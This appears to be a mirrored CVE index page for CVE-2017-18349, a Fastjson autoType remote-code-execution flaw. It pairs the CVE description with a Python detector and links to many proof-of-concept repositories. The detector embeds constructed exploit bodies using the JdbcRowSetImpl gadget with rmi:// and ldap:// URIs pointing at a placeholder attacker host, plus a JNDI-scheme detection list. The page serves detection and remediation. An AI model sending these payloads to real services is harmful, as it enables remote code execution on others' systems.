mirror of
https://github.com/0xMarcio/cve.git
synced 2026-05-25 12:44:05 +02:00
45 lines
1.9 KiB
Markdown
### [CVE-2017-18349](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18349)
### Description
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
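
The description names the field (`dataSourceName`) and the URI scheme (`rmi://`) but not the object that carries them: the crafted request sets Fastjson's `@type` hint to `com.sun.rowset.JdbcRowSetImpl`, a JDK class whose `setAutoCommit` setter connects to whatever `dataSourceName` holds via `InitialContext.lookup()`, so a `rmi://` or `ldap://` URI there fetches attacker-controlled code. The following is an added example, not code from this repository, from Fastjson or from Pippo: a constructed request body of that shape plus a small detector that flags `@type`-tagged objects carrying a JNDI-scheme string, suitable for log triage or a WAF pre-filter. The host `attacker.example`, the object name `Exploit`, and the function names are illustrative assumptions.

```python
"""Detect CVE-2017-18349-style Fastjson autoType/JNDI payloads in request bodies (added example)."""
import json
from typing import Any, Iterator

# URI schemes that a gadget such as JdbcRowSetImpl.dataSourceName hands to
# InitialContext.lookup(); any of these inside an @type-tagged object is hostile.
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://", "iiop://")


def _walk(node: Any, path: str = "$") -> Iterator[tuple[str, dict]]:
    """Yield every JSON object in the tree with a JSONPath-like location, so nested
    gadgets (inside arrays or sub-objects) are not missed by a top-level-only check."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}[{i}]")


def find_autotype_jndi(body: str, strict: bool = False) -> list[dict]:
    """Return one finding per object that carries an @type hint together with a
    JNDI-scheme string field. With strict=True, any @type hint at all is reported,
    which is appropriate for applications that never rely on autoType."""
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return []  # not JSON; this rule has nothing to say about it
    findings = []
    for path, obj in _walk(doc):
        type_hint = obj.get("@type")
        if not isinstance(type_hint, str):
            continue
        jndi_fields = [
            (field, value)
            for field, value in obj.items()
            if isinstance(value, str) and value.lower().startswith(JNDI_SCHEMES)
        ]
        for field, value in jndi_fields:
            findings.append({"path": path, "type": type_hint, "field": field, "uri": value})
        if strict and not jndi_fields:
            findings.append({"path": path, "type": type_hint, "field": None, "uri": None})
    return findings


# Constructed request bodies (not captured traffic); attacker.example is a placeholder host.
MALICIOUS_BODY = json.dumps({
    "@type": "com.sun.rowset.JdbcRowSetImpl",        # JDK gadget reached via Fastjson autoType
    "dataSourceName": "rmi://attacker.example:1099/Exploit",  # the field named in the CVE text
    "autoCommit": True,                              # setter whose call performs the JNDI lookup
})
NESTED_BODY = json.dumps({"items": [{"id": 1}, {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "ldap://attacker.example/x",
    "autoCommit": True,
}]})
# No @type hint: Fastjson maps this to a plain JSONObject, so the rmi:// string is inert.
BENIGN_BODY = json.dumps({"dataSourceName": "rmi://not-a-gadget", "name": "x"})

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_BODY), ("nested", NESTED_BODY),
                        ("benign", BENIGN_BODY), ("garbage", "not json {")):
        print(label, find_autotype_jndi(body))
```

The detector is a compensating control only: the fix is upgrading Fastjson past 1.2.25, where autoType is off by default behind a denylist, and on 1.2.68 or later additionally calling `ParserConfig.getGlobalInstance().setSafeMode(true)` so that `@type` is never honoured regardless of list contents.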
### POC
#### Reference

- https://fortiguard.com/encyclopedia/ips/44059

#### Github

- https://github.com/ARPSyndicate/cve-scores
- https://github.com/ARPSyndicate/cvemon
- https://github.com/CLincat/vulcat
- https://github.com/Nickel-Angel/lingxi-server
- https://github.com/PAGalaxyLab/VulInfo
- https://github.com/ReAbout/audit-java
- https://github.com/W01fh4cker/LearnFastjsonVulnFromZero-Basic
- https://github.com/bigblackhat/oFx
- https://github.com/g1san/Agents-for-Vulnerable-Dockers-and-related-Benchmarks
- https://github.com/h0cksr/Fastjson--CVE-2017-18349-
- https://github.com/happycao/lingxi-server
- https://github.com/hinat0y/Dataset1
- https://github.com/hinat0y/Dataset10
- https://github.com/hinat0y/Dataset11
- https://github.com/hinat0y/Dataset12
- https://github.com/hinat0y/Dataset2
- https://github.com/hinat0y/Dataset3
- https://github.com/hinat0y/Dataset4
- https://github.com/hinat0y/Dataset5
- https://github.com/hinat0y/Dataset6
- https://github.com/hinat0y/Dataset7
- https://github.com/hinat0y/Dataset8
- https://github.com/hinat0y/Dataset9
- https://github.com/junesi513/AVR_Agent
- https://github.com/luckyfuture0177/VULOnceMore
- https://github.com/openx-org/BLEN
- https://github.com/pan2013e/ppt4j
- https://github.com/qiuluo-oss/Tiger